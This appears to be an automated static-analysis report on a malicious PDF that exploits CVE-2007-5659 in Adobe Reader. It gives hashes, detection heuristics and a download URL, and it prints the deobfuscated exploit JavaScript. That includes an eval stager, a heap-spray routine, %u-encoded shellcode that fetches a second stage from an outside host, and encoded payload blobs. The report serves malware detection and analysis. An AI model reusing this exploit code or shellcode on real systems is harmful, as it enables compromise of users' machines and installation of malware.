Malicious PDF — malware analysis report

Static analysis result for SHA-256 0948a1267ee7ff67…

MALICIOUS

PDF

16.7 KB
MD5: 316ff3e5e679a59c4a7aedc9b59e440f SHA-1: 3fdbadba9472ea3ea1249d710a6217b9b4844be6 SHA-256: 0948a1267ee7ff676b1510c2fe91f2d5856ac5796fc1e14c642592b3c14ff0ee
406 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script is designed to download a second-stage payload from the URL http://ljipou.info/page/information.html/n002106201r0013Re4e414f8X801a2551Y3224b0d1Z0100f080. The presence of multiple JavaScript exploit heuristics and a critical ClamAV detection strongly indicates malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 11

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Annotation subject callee-key hex JavaScript stager high PDF_ANNOT_SUBJECT_CALLEE_HEX_STAGER
    PDF JavaScript uses syncAnnotScan()/getAnnots() to read an indirect annotation /Subject stream, percent-decodes it through marker replacement, then uses a callee.toString()-derived key to decode and eval the final exploit stage.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ljipou.info/page/information.html/n002106201r0013Re4e414f8X801a2551Y3224b0d1Z0100f080 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d		 pdf-javascript-stream PDF /JS object 9 at offset 0x405C 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
annotation_subject_callee_hex_stage_000.js
65d73955abec45062e58392cd820489f07670e46d7ca15c7399a4971f424ee15		 deobfuscated-js annotation-subject callee-key decoded JavaScript at offset 0x1A31 5227 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var r5_2WLDP1h_WS2 = new Array();var up4lJDDVl6_n_j = 0;var X62k_8OamR780 = "";function gV2UeG(R0676PNY_53, VL___Mx_6_i){var c6Yq0458__OxC_w = VL___Mx_6_i.toString();var tk76_3oR4d = "";for(var RiQ64DaB = 0; RiQ64DaB < c6Yq0458__OxC_w.length; RiQ64DaB++) {var s_nIFjIVeC = parseInt(c6Yq0458__OxC_w.substr(RiQ64DaB, 1));if (!isNaN(s_nIFjIVeC)) {s_nIFjIVeC = s_nIFjIVeC.toString(16);if (s_nIFjIVeC.length == 1) { s_nIFjIVeC = "0" + s_nIFjIVeC; }else if (s_nIFjIVeC.length != 2) { s_nIFjIVeC = "00"; }tk76_3oR4d = s_nIFjIVeC + tk76_3oR4d;if (tk76_3oR4d.length == 8) {break;}}}while(tk76_3oR4d.length < 8) { tk76_3oR4d = "0" + tk76_3oR4d; }var ltK_50wx3T = R0676PNY_53.toString(16);if (ltK_50wx3T.length == 1) { ltK_50wx3T = "0" + ltK_50wx3T; }else if (ltK_50wx3T.length != 2) { ltK_50wx3T = "00"; }tk76_3oR4d = "3" + ltK_50wx3T + "P" + tk76_3oR4d;return tk76_3oR4d;}function y_3Xt3R_U(fhk3__16b_7, mImodIvR){var xaktnV = new Array("");var pCH_0h = fhk3__16b_7;var e83UCdHg65UA8Ku;if ((e83UCdHg65UA8Ku = fhk3__16b_7.lastIndexOf("%u00")) != -1) {if (e83UCdHg65UA8Ku + 6 == fhk3__16b_7.length) {xaktnV[0] = fhk3__16b_7.substr(e83UCdHg65UA8Ku + 4, 2);pCH_0h = fhk3__16b_7.substring(0, e83UCdHg65UA8Ku);}}e83UCdHg65UA8Ku = 1;for (RiQ64DaB = 0; RiQ64DaB < mImodIvR.length; RiQ64DaB++) {var YQ__840oD_E_PP = mImodIvR.charCodeAt(RiQ64DaB).toString(16);if (YQ__840oD_E_PP.length == 1) { YQ__840oD_E_PP = "0" + YQ__840oD_E_PP; }xaktnV[e83UCdHg65UA8Ku] = YQ__840oD_E_PP;e83UCdHg65UA8Ku++;}RiQ64DaB = xaktnV[0].length ? 0 : 1;xaktnV[e83UCdHg65UA8Ku] = "00";xaktnV[e83UCdHg65UA8Ku + 1] = "00";e83UCdHg65UA8Ku += 2;if ((xaktnV.length - RiQ64DaB) % 2) {xaktnV[e83UCdHg65UA8Ku] = "00";}while(RiQ64DaB < xaktnV.length) {pCH_0h += "%u" + xaktnV[RiQ64DaB + 1] + xaktnV[RiQ64DaB];RiQ64DaB += 2;}pCH_0h += "%u0000";return pCH_0h;}function Tt_56G6UA_h4(N210e_4LqTO, V_52bVB_Hv){while (N210e_4LqTO.length*2<V_52bVB_Hv) {N210e_4LqTO += N210e_4LqTO;}N210e_4LqTO = N210e_4LqTO.substring(0,V_52bVB_Hv/2);return N210e_4LqTO;}function fm3_p7(v7___BW65_d, aH__1F8C_p, S_dSW1DA){var X_I1Eiq = 0x0c0c0c0c;var N210e_4LqTO = unescape(aH__1F8C_p);var mImodIvR = gV2UeG(v7___BW65_d, S_dSW1DA);var s0Ys_S_L__Oa1 = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var fhk3__16b_7 = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u7870%u4458%u7845%u4447%u0045%u7468%u7074%u2f3a%u6c2f%u696a%u6f70%u2e75%u6e69%u6f66%u702f%u6761%u2f65%u6e69%u6f66%u6d72%u7461%u6f69%u2e6e%u7468%u6c6d%u6e2f%u3030%u3132%u3630%u3032%u7231%u3030%u3331%u6552%u6534%u3134%u6634%u5838%u3038%u6131%u3532%u3135%u3359%u3232%u6234%u6430%u5a31%u3130%u3030%u3066%u3038";app.Hm68x_x_EJEb_k = unescape(y_3Xt3R_U(fhk3__16b_7, mImodIvR));var x2k_b_J4WreiS = 0x400000;var va6pO___5h = s0Ys_S_L__Oa1.length * 2;var V_52bVB_Hv = x2k_b_J4WreiS - (va6pO___5h+0x38);N210e_4LqTO = Tt_56G6UA_h4(N210e_4LqTO, V_52bVB_Hv);var wW_QS_3jyF65CW0 = (X_I1Eiq - 0x400000)/x2k_b_J4WreiS;for (var XX_Mr0LT_5 = 0; XX_Mr0LT_5 < wW_QS_3jyF65CW0; XX_Mr0LT_5++) {r5_2WLDP1h_WS2[XX_Mr0LT_5] = N210e_4LqTO + s0Ys_S_L__Oa1;}}function B__1___3v7bgP0(){var A_cT8c5wNXs5uf = "";for (RiQ64DaB = 0
... (truncated)
legacy_pdfkit_stage_000.js
113ec4ae4f9762779127b1860e80ecf2d9fc63373c3431e7af857d058d10629a		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1A85 11722 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function Yv__B882qM3v(Vh__E_m6721_a, X_EKar__W_PwJ_f){var eB_N6c_W70 = new Array();var W3__1m_o = 512;var yaS7__E = 21;var BF473h22 = 0;var G5_kRn0 = 0;var t_KrcjQ1_kNM5fs = 0;var naq_A_M = "";var jgRRQrKj2Mh_k = "";var oPI6__P0i_u_kj6 = 6;try {var Ij5yX7 = 0;if (app) {t_KrcjQ1_kNM5fs = t_KrcjQ1_kNM5fs + 2;X_EKar__W_PwJ_f = pr[Ij5yX7].subject;}} catch(e) { }t_KrcjQ1_kNM5fs = t_KrcjQ1_kNM5fs + 5;if (!Vh__E_m6721_a) { eB_N6c_W70 = new Array(87,113,31,17,165,28);} else {eB_N6c_W70 = Vh__E_m6721_a;}var Qww__Bx_6V_X_1w = 0;var nI_UnU__C_3QH7i = 0;var RXEr_8372 = 0;while(nI_UnU__C_3QH7i < X_EKar__W_PwJ_f.length) {var li0oPb0_tUS_8 = X_EKar__W_PwJ_f.substr(nI_UnU__C_3QH7i, 2);var V_yxP__C = parseInt(li0oPb0_tUS_8, 21);if (Qww__Bx_6V_X_1w >= oPI6__P0i_u_kj6) {Qww__Bx_6V_X_1w = 0;}V_yxP__C -= eB_N6c_W70[Qww__Bx_6V_X_1w] * (RXEr_8372 + 2);if (V_yxP__C < 0) {V_yxP__C -= Math.floor(V_yxP__C / 256) * (W3__1m_o / 2);}if (nI_UnU__C_3QH7i >= 0) {V_yxP__C = String.fromCharCode(V_yxP__C);}if (t_KrcjQ1_kNM5fs == 6) {naq_A_M += r__Doufc07lWo;} else if (t_KrcjQ1_kNM5fs == 7) {naq_A_M += V_yxP__C;} else {naq_A_M += nI_UnU__C_3QH7i;}Qww__Bx_6V_X_1w++;nI_UnU__C_3QH7i += 2;RXEr_8372++;}var X4i5AXo_78 = this;X4i5AXo_78['ev'+'al'](naq_A_M);}
	Yv__B882qM3v(0, "1f8cb75c3hbi12216f07008kbc073g5fb637b5649dbeab29bf22a44b8fab088i459c72600a8439b660c22e1cb16d1h8j53ag8e7i0b1f2e4g5j3d199f5105bb8kb26e52a4b0097c2a422h582j4k99521i4fba69937ga41109503b5d4e9a7308b760b23kb40e6k898g0b3f9b0c8g3cb8aea7afai046237944hba944h9242388e3b25ah399495bfa54k515ebc8c3j8kb928b3333c35bkc00792058c8i7d1c64a21ea1331ec1343j91ab2e7839b149462540c12b2e26bj044k5204873baa5ba52c5k4c290e60b8bj22c1a59079811d6h5201845k492h196d76c22cb0970g3d906j636k3922526b376i8k27214e092d3e129j7j608474bg4160186c0c86a55k8g1b6e938d9h4123a473368436902952b06i913f8b3691b66e27122c17b003bk629j9j96838ja29g8ka95f6f099i4d0428358b4eak108e93a9487abh2d4g2k1a0dbk154g70c085299d062g00483848ae6aa4371ibi6jb17485089745518i5c2e45b29a6h1217a05h3b4jb33g6360682i6b3k0f330i12316eb9bf579d7i46425ka6ak2i423747347k0a7f950c7d61778666ac086g5j53024j1i1kaj5dak04ae2ba0814308170a5885a572458cai735k2j92ah8jb53d0i567446b6b5946d810hc2957iba5a8i8k1854734236b505c1bc21b0ac85a1580b931d073a7j7f1hb68549b8a1bk2i5jag7c69772j175da62i0e0i87282i150h4c6i017a2d564h188g27a41c1bai7a7eaba05b4c3fc28d4030ab1h51690i5k73a98f4eb14f596eb42a7d7aak116i18346g6bc2982aaf8c4e9b4h994d6f94376e7h388k8h23209g87af51c37j8067a8bh4g096bbk86751k513f7dak0d1799395i00b66c03a6bd923c7c3e0a9ia5072j99ah4aaca98g2c59a4ai30596c3h9j1kbj331f325a157a204i0c1k3957bb892c9b1i0k561i1a5b14870k777jbf1b2dajbi8c773k067a48574k5a7d73016b0a5c160d211i6163c38e65394c547b67ba270c4b2f2e70c1827ac322858b1c4c4e7k0j9i848e3c658g4j4g9ebe1g0j26146036aa380e876a2ba8a4214d7fak751fc20f796k3096bkaf7j1fbjab6g6i048485445b340i2g488f6ga70i0k2c431b2jb45a8660c230a64h8206167ebb114k40b72a094h9f8f80ac0h0baf4d947811b93i9568313f4310a72ab011c19030489j3aag638d365j2h5k1h119f9h4ebaae5j829b6984881178525f3g75448g097h2c4cba35937i7bac392b4f7332996c4902961c611k1i8b995g3g5h9i35a428agae9i8ka00d8d158f787k634i84540g7d4a071b65b9a10d9d335482be873jbg27380i3i3305b47h11b718529g7b1f6ia7a76ebfaj0g6i5f8i792c9117aa426eb94a863a532d0d1h7k5h13a4347h2j1g1c6g0e5fbd39bc074801ab89899434745i42725k591g0i567abd3a00b00h4a9e42688b4022437c1241762e177c9j272kaf6k7d7f965abj4h8j496h149j0h9dac4i2f535g9k4hb3763i1g68c089c129a3767e81843b537f6e1baa122db1100936a3ba9i837kb37b568g3g2c13760c081i2h5b76bcab78b5063g511d578a5b513db29k5gb42bbg2k980e2aag6jbd2g6k7ibh380h026da47hak38620k60946g4h4f0i766h0c25b37a2h3hah2i57506019566701bi96bhbh2g8h89350i8f536e59a57d453f2f4g316j1e7482b57a787g576kaj036f6a912475551bb5646d3a7i098h7g5cak2gb33292bh6i6607ab87a86h04806ha137263e8d2g90c29a7g5e1c8a6e4c02368i0b4j154b2g4hbg9kb1af1iak9j606g29ad530c3h5g7c8e2e1g9i020b6209127d0b76698i200795006c3k42b03c1c3dc12j47c2832f601cbf85b627464dah4a6eajb4503g229caf5f5a020h3g7dc04765a78678bc6e3j79182g6h770g3j5b452e7e730e9215aj74276a32074i5g9i64a0a5319f882c266c7i771190757j2i73b56fbd5kc084504h304789af25006h375gbjb5ac25a6bia13c41428ead932025bba135ac7k072j89bi0j547f61545jaebc24aj2f1f1c8i1g6c1fae026097b90f8b22055c121g5b38994k9eaa
... (truncated)
deobfuscated.js
a1c58b8a2f6c9e33c1d113ac76bc4109f8742ad1c019376b17bd95192fbcfff5		 deobfuscated-js PDF JavaScript deobfuscation pass 88253 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 eval/decoder/string-building token(s). Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
1f8cb75c3hbi12216f07008kbc073g5fb637b5649dbeab29bf22a44b8fab088i459c72600a8439b660c22e1cb16d1h8j53ag8e7i0b1f2e4g5j3d199f5105bb8kb26e52a4b0097c2a422h582j4k99521i4fba69937ga41109503b5d4e9a7308b760b23kb40e6k898g0b3f9b0c8g3cb8aea7afai046237944hba944h9242388e3b25ah399495bfa54k515ebc8c3j8kb928b3333c35bkc00792058c8i7d1c64a21ea1331ec1343j91ab2e7839b149462540c12b2e26bj044k5204873baa5ba52c5k4c290e60b8bj22c1a59079811d6h5201845k492h196d76c22cb0970g3d906j636k3922526b376i8k27214e092d3e129j7j608474bg4160186c0c86a55k8g1b6e938d9h4123a473368436902952b06i913f8b3691b66e27122c17b003bk629j9j96838ja29g8ka95f6f099i4d0428358b4eak108e93a9487abh2d4g2k1a0dbk154g70c085299d062g00483848ae6aa4371ibi6jb17485089745518i5c2e45b29a6h1217a05h3b4jb33g6360682i6b3k0f330i12316eb9bf579d7i46425ka6ak2i423747347k0a7f950c7d61778666ac086g5j53024j1i1kaj5dak04ae2ba0814308170a5885a572458cai735k2j92ah8jb53d0i567446b6b5946d810hc2957iba5a8i8k1854734236b505c1bc21b0ac85a1580b931d073a7j7f1hb68549b8a1bk2i5jag7c69772j175da62i0e0i87282i150h4c6i017a2d564h188g27a41c1bai7a7eaba05b4c3fc28d4030ab1h51690i5k73a98f4eb14f596eb42a7d7aak116i18346g6bc2982aaf8c4e9b4h994d6f94376e7h388k8h23209g87af51c37j8067a8bh4g096bbk86751k513f7dak0d1799395i00b66c03a6bd923c7c3e0a9ia5072j99ah4aaca98g2c59a4ai30596c3h9j1kbj331f325a157a204i0c1k3957bb892c9b1i0k561i1a5b14870k777jbf1b2dajbi8c773k067a48574k5a7d73016b0a5c160d211i6163c38e65394c547b67ba270c4b2f2e70c1827ac322858b1c4c4e7k0j9i848e3c658g4j4g9ebe1g0j26146036aa380e876a2ba8a4214d7fak751fc20f796k3096bkaf7j1fbjab6g6i048485445b340i2g488f6ga70i0k2c431b2jb45a8660c230a64h8206167ebb114k40b72a094h9f8f80ac0h0baf4d947811b93i9568313f4310a72ab011c19030489j3aag638d365j2h5k1h119f9h4ebaae5j829b6984881178525f3g75448g097h2c4cba35937i7bac392b4f7332996c4902961c611k1i8b995g3g5h9i35a428agae9i8ka00d8d158f787k634i84540g7d4a071b65b9a10d9d335482be873jbg27380i3i3305b47h11b718529g7b1f6ia7a76ebfaj0g6i5f8i792c9117aa426eb94a863a532d0d1h7k5h13a4347h2j1g1c6g0e5fbd39bc074801ab89899434745i42725k591g0i567abd3a00b00h4a9e42688b4022437c1241762e177c9j272kaf6k7d7f965abj4h8j496h149j0h9dac4i2f535g9k4hb3763i1g68c089c129a3767e81843b537f6e1baa122db1100936a3ba9i837kb37b568g3g2c13760c081i2h5b76bcab78b5063g511d578a5b513db29k5gb42bbg2k980e2aag6jbd2g6k7ibh380h026da47hak38620k60946g4h4f0i766h0c25b37a2h3hah2i57506019566701bi96bhbh2g8h89350i8f536e59a57d453f2f4g316j1e7482b57a787g576kaj036f6a912475551bb5646d3a7i098h7g5cak2gb33292bh6i6607ab87a86h04806ha137263e8d2g90c29a7g5e1c8a6e4c02368i0b4j154b2g4hbg9kb1af1iak9j606g29ad530c3h5g7c8e2e1g9i020b6209127d0b76698i200795006c3k42b03c1c3dc12j47c2832f601cbf85b627464dah4a6eajb4503g229caf5f5a020h3g7dc04765a78678bc6e3j79182g6h770g3j5b452e7e730e9215aj74276a32074i5g9i64a0a5319f882c266c7i771190757j2i73b56fbd5kc084504h304789af25006h375gbjb5ac25a6bia13c41428ead932025bba135ac7k072j89bi0j547f61545jaebc24aj2f1f1c8i1g6c1fae026097b90f8b22055c121g5b38994k9eaac3412faf137k88330e7b4a742b2i7574b531a7243d2340495j3d9c057c2h27636h7dc01a9f4b2g3e6dae7g5393149h86258d4881249kac8b1j556f5d72737a25ad6a2j9c74155i3a8c98bga0b92g70aka531269d04793gbj6a96bdb01h08218k61be76635f6926ag552k915e8daabh2d3d1b459h5c846700c326467e25209518041j40b843266f0h90850h121e874e5d6h00955i5a58220c4j08a93e14220gb04e407h4h8h63a80f2i3k7b1h11b29f350a1k8f825j35b6a91daa515j3a7d648c0b7h1k0e88357b7g8gac183741682c645b009h5ea174231a879f9a225d011f7240a1aj95bk7fa87c1j6i69b4801f6c4206881caeb76j03bb00ai601568c16g4k8b0k2jae031j051haj0jc10k7e8i75127a9a1ga0c1aa3h6c466ia9bfahbd804f35bb3703051fbgbj30818c42ag2g9b40130h3j1d43184391b813b3a1787k6e5h9378419b514j433k7555b9460cak0a3i8e6b7f71382e545312348ebbak5615331dbh8j558384579e1f510e8ja979aa64892h65879b9k7k1j747530862g7h36321ca4bf797j448db27208c12c3k8h03b236beabb6a96i7a9f5d9c3a5i2g6i2e0j0j1a5446b30b778k095560103k8i2c58471j1551a6bd8c136bb2091270083aah70ad0a3b08770cagb50i5i1d4d834d1f3ibf8b6b1759915h3j42862d525g791557632b1896b8092ga38i2ga0a7654d6gaea252503h3b076hbd7aa6b36985936j3085944k375kbe6h4i22089a9229783aa795660i36185h9kad6a4hb10j816h5bbe8a8j995gbk2d5e30bj0ebjae7b158a7a59022g8hbk1k37802i3caf13150i2a071f82ab58978a1i1569a78h172g97322492ac1g509k717f57bh2g7bbj5i181j8f3k4c51930c5f1k9e21701i0f98bf27464dah
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.